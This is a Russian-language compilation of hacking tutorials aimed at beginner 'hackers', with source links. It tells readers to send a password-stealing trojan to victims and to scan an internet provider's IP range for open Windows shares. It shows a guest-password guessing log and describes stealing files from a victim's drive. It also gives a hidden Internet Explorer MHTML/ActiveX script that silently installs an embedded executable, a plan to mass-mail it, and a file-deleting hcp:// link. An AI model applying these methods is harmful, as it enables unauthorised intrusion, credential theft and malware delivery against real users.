Привет всем начинающим хакерам тут выложу статью по тому как взломать компьютер.

Как взломать свой компьютер если ты забыл пароль к нему. ПОЛЕЗНОЕ ВИДЕО ОТ metacafe.
http://www.kiwi.kz/watch/2x15sh3ep2qu

Как взломать компьютер!
Запускаем сканер Essential NetTools 3.0. Теперь нужно определиться какой Ip диапазон следует просканировать. Для этого просто заходим в вкладку ViewLocal IP Addresses и смотрим свой Ip, пусть будет такой 123.333.253.12. Значит пишем первый (начальный)диапазон Ip 123.333.253.1 а второй (конечный) 123.333.253.255 И видим что сканер нашел кучу удаленных компьютеров в этом диапазоне, но большинство компов не доступно для простого проникновения (no), но есть компьютеры где написано (yes), именно в такие компьютеры мы можем попасть без труда, для этого нужно просто нажать на нем правой кнопкой мышки и щелкнуть по "open computer" и через несколько минут откроется окно где Вы увидите содержимое удаленного компьютера. Вот и все!

Есть еще один способ. Для этого нам потребуется троян Смерть Ламера 2.6 (Lamer Die 2.6) или Anti-Lamer BackDoor (Скачайте в разделе "Троян AntiLamer"). Запускаем Редактор сервера и настраиваем троян по своему вкусу. И так, сервер готов, а да совсем забыл самое главное нужно настроить сервер чтобы троян присылал пароли Вам, так вот кидаете трояна кому ни будь и ждете пока к Вам не придет письмо от трояна.

Пришло письмо - пароли на инет, но вспомните главное было не пароли, а доступ к компьютеру. Так вот в письме помимо пароля указывается Ip адрес компьютера и его название в сети . Вот это нам и надо. Теперь сканируем Ip диапазон который получили, только помните если Ip 213.34.56.13 то нужно сканировать диапазон 213.34.56.1 - 213.34.56.254. Вот в принципе и все. Осталось только дождаться когда жертва выйдет в интернет и запустить Death.exe, вводим Ip жертвы, подсоединяемся и получаем полный контроль над кампом!!! Удачного Вам хака!

Рекомендации начинающему хакеру

Для того, чтобы стать удачливым компьютерным взломщиком, вам потребуется один прибор - ваши мозги. Вам не нужен даже компьютер. Более того, иногда бывает лучше вообще не иметь компьютера, как вы увидите в дальнейшем. Впрочем, для начала вам все же потребуется компьютер, модем и телефонная линия для связи с внешним миром.

Компьютер может быть каким угодно. Гораздо важнее, какой у вас модем и коммуникационное программное обеспечение. Хакерство - хобби, не требующее большого количества снаряжения; но если вам приходится что-то покупать, покупайте самое лучшее из того, что вы сможете себе позволить. Это не означает, что вы должны приобретать то, что вам предлагают продавцы или специальные журналы. Выбирайте то, что вам больше всего подойдет. Уверен, вы захотите, чтобы ваш модем был быстрым. Когда я приобрел свой первый модем, то считал 140-бодный модем просто копушей. Теперь я смотрю на 300-бодный и не понимаю, как я мог управляться с этой каракатицей.

Какой бы скоростью ни обладал ваш модем, он всегда будет работать несколько медленнее, чем вы ожидали. Из-за помех на линии модем бывает вынужден перепосылать данные снова и снова, пока не передаст или не примет их в неискаженном варианте. Модемы могут работать вполовину указанной скорости, и, если у них плохое настроение, и того медленнее. При передаче на дальние расстояния или если удаленные компьютеры слишком загружены, или при доступе к одному компьютеру через несколько других - чтобы вас труднее было выследить - скорость снижается еще больше.
Итак, если вы хотите получать удовольствие от своих занятий - покупайте высокоскоростной модем.

Коммуникационное программное обеспечение
Бывает трудно найти действительно подходящую коммуникационную программу, но именно от нее, в совокупности с подходящим модемом, и зависит, принесет ли вам радость ваша работа в режиме он-лайн или только разочарует вас. Существует много видов терминальных программ. Если какой-то пакет приложен к вашему модему, это еще не значит, что он вас устроит. Хорошая программа должна обладать нижеперечисленными свойствами и все они для хакера необходимы или хотя бы желательны.
http://www.rkhaker.clan.su/forum/15-3-1

Взлом удаленного компьютера через интернет

Постараюсь объяснить как это сделать так сказать "на пальцах", насколько у меня это получится - не знаю поскольку все это постигал сам...
Взлом, Интернет
Постараюсь объяснить как это сделать так сказать "на пальцах", насколько у меня это получится - не знаю поскольку все это постигал сам... Прежде всего мой совет:
Установите на свой компьютер Windows 2k
Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0
Скачайте и установите на свой компьютер HakTek v1.1
NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!
В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!
Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта http://www.pysoft.com/ звонилку Advanced Dialer, ну этого должно хватить...
Теперь некоторые объяснения предыдущих действий:
Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на >Мой компьютер> выбираем >Сетевая идентификация >Свойства, в нижней части там где написано "Является членом:" должна стоять галочка "Рабочей группы" вы пишите нужное вам имя рабочей группы, нажимаете "ОК" и вам высвечивается приветствие "Добро пожаловать в рабочую группу такую-то", вы нажимаете кнопочку "ОК" и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку "ОК", как ранее, а просто закрыть окошко, теперь вам просто нужно нажать "ОК" на "Свойствах системы" и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить "НЕТ". Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах "для домохозяек", а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!
Зачем жен нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....
HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания.
Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!
Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:

Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS
Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования "Starting IP adress" (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес "Ending IP adress" (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...
После того как процесс сканирования окончен мы увидим примерно следующее:
NAME WORKGROUP RS IP Adress MAC Adress
Legioner Legion666 Yes 194.153.128.15 это нас не интересует
Vovan Workgroup No 194.153.128.19 это нас не интересует
Dmitriy Venera Yes 194.153.128.21 это нас не интересует
Sinelnikov Claus Yes 194.153.128.32 это нас не интересует
Kinder Troja Yes 194.153.128.43 это нас не интересует
Sky Circus Yes 194.153.128.47 это нас не интересует
Trishka Killers No 194.153.128.64 это нас не интересует
Judge Dred No 194.153.128.69 это нас не интересует

4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему.

Для этого:

Включаем NAT
Вводим адрес IP - например 194.153.128.15 и нажимаем "SCAN"
Теперь немного подождем...
Что мы видим:

* Checking 194.153.128.47 ...
* Obtained NetBIOS name table:
SKY
SKY
CIRCUS
SKY
CIRCUS
DAN
CIRCUS
..__MSBROWSE__.
* Trying username "ADMINISTRATOR", password "": failed - начало подбора пароля
* Trying username "ADMINISTRATOR", password "ADMINISTRATOR": failed
* Trying username "ADMINISTRATOR", password "GUEST": failed
* Trying username "ADMINISTRATOR", password "ROOT": failed
* Trying username "ADMINISTRATOR", password "ADMIN": failed
* Trying username "ADMINISTRATOR", password "PASSWORD": failed
* Trying username "ADMINISTRATOR", password "TEMP": failed
* Trying username "ADMINISTRATOR", password "SHARE": failed
* Trying username "ADMINISTRATOR", password "WRITE": failed
* Trying username "ADMINISTRATOR", password "FULL": failed
* Trying username "ADMINISTRATOR", password "BOTH": failed
* Trying username "ADMINISTRATOR", password "READ": failed
* Trying username "ADMINISTRATOR", password "FILES": failed
* Trying username "ADMINISTRATOR", password "DEMO": failed
* Trying username "ADMINISTRATOR", password "TEST": failed
* Trying username "ADMINISTRATOR", password "ACCESS": failed
* Trying username "ADMINISTRATOR", password "USER": failed
* Trying username "ADMINISTRATOR", password "BACKUP": failed
* Trying username "ADMINISTRATOR", password "SYSTEM": failed
* Trying username "ADMINISTRATOR", password "SERVER": failed
* Trying username "ADMINISTRATOR", password "LOCAL": failed
* Trying username "GUEST", password "": failed
* Trying username "GUEST", password "ADMINISTRATOR": failed
* Trying username "GUEST", password "GUEST": succeeded - пароль успешно подобран
* Obtained share list: - список возможных доступных ресурсов
IPC$ Remote IPC
E$ Default share
D$ Default share
C
ADMIN$ Remote Admin
C$ Default share
* Obtained server information:
Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]
* Checking share E$: access denied - доступ запрещен
* Checking share D$: access denied - доступ запрещен
* Checking share C: read-write access - доступ разрешен для чтения-записи
* Checking share ADMIN$: access denied
* Checking share C$: access denied
* Finished checking 194.153.128.47

Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!
Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную "жертву", в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню "Open computer". В ответ откроется стандартное окно Windows где будет присутствовать диск "С". Наводим на этот самый диск "С" нажимаем правую кнопку мыши и в контекстном меню выбираем "Подключить сетевой диск", когда главный каталог будет считан мы можем начинать "лазить", а точнее сказать "ползать" по диску "С" удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного "Проводника", Windows Commander и других программ.
http://stfw.ru/page.php?id=87

Взламываем компьютер через Internet Explorer
Взламываем компьютер через Internet Explorer

Автор: Digital Scream

О чем идет речь?

Темой данной заметки является описание способа загрузки и исполнения произвольных приложений на клиентском компьютере. Естественно, что пользователь обязан сделать - посетить некий узел. Чтобы добиться результатов следует прибегнуть к приемам НЛП. Согласитесь, вероятнее всего человек быстрее нажмет на ссылку ведущую к web страничке, нежели на файл. Наша с вами задача придумать способ загрузить и исполнить приложение на его компьютере. Что, оказывается, весьма несложно сделать... Многие не имеют опыта такого проникновения на целевой компьютер. Хотя он является, пожалуй, одним из лучших. Это связано с тем, что пользователю не нужно будет подтверждать никакой загрузки файла, а потом еще и вручную его запускать. За него все сделает Internet Explorer.

Как это работает?

Пример действует по достаточно интересной схеме:
загружается как HTML файл
загружает себя как MHTML
Сам HTML файл состоит из двух блоков: первый указывает на наличие некого файла согласно стандартам MHTML и MIME, а второй блок - это HTML. Первый блок для второго является простым текстом, хотя в действительности это файл, зашифрованный в base64. Поэтому при открытии файла срабатывает блок HTML:
BОDY
SСRIPT
function Execute()
{
path=unescapе(dоcument.URL.substr(-0,document.URL.lastIndexОf("\\")));
document.write( '<оbject style="visibility:hidden" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\main.html!file:///InternetExplorer.exe">') } Execute(); /SСRIPT
Немного поясню, что именно происходит. При обработке данного документа исполняется скрипт, устанавливающий новый компонент с CLSID(ClassID) 66666666-6666-6666-6666. Исполняемый код для компоненты берется из этого же файла и именно поэтому происходит определение его местоположения (переменная path). Вся разница в том, что открывается он уже как MHTML. Поэтому мы можем обращаться к любому ресурсу, хранящемуся в нем (в данном случае это приложение). Его указание происходит согласно следующей форме записи:

mhtml:имя_html_файла!имя_ресурса

Что касается первого блока, то его заголовок должен выглядеть примерно следующим образом:

MIME-Version: 1.0
Content-Location:file:///InternetExplorer.exe
Content-Transfer-Encoding: base64

В качестве значения Content-Location желательно указать что-нибуть приличное. Эта переменная потом появится в строке состояния Internet Explorer как окончание к тексту "Установка компонента...". Тем более, что именно ее необходимо указывать как имя желаемого ресурса. Далее должен идти бинарный код приложения в формате base64.

Как можно автоматизировать процесс?

Для построения полнофункциональной универсальной утилиты необходимо создать следующую систему:
1 HTML файл, посылающий запрос на сервер с формой хранящей такие данные как:
- атакуемая почта
- содержание письма
- исполняемый файл (используйте INРUT "tуpe=filе")
- содержание HTML файла хранящего исполняемый
2 PERL скрипт, создающий на сервере специально сформированный HTML файл, хранящий исполняемое ПО в base64 и то, что пользователь увидит в броузере. В base64 обычный EXE файл можно конвертировать использовав модуль MIME::Base64:
$encoded=encode_base64($decoded);
$decoded=decode_base64($encoded);
После чего отсылается письмо пользователю на компьютере которого необходимо запустить приложение. Согласитесь, весьма проста и в тоже время интересная технология.

Что это нам дает?

Такая уязвимость позволяет незаметно установить удаленному пользователю практически любое приложение. Среди таких приложений могут также быть вирусы и троянские кони. И как всегда решением является банальное запрещение загрузки ActiveX.

Есть готовый пример?

А для желающих проверить все вышесказанное предлагается готовый файл main.html. Вдобавок хочу написать, что человеческая фантазия не имееет границ. Так, совсем недавно мне попалось сообщение о том, что направив пользователя по ссылке hcp://system/DFS/uplddrvinfo.htm?file://c:\main.txt можно удалить у него файл c:\main.txt, если такой действительно существует. Это значит, что всегда необходимо искать что-то новое, поверьте оно найдется :)
http://bcteam.by.ru/pages/articles/vzkia.html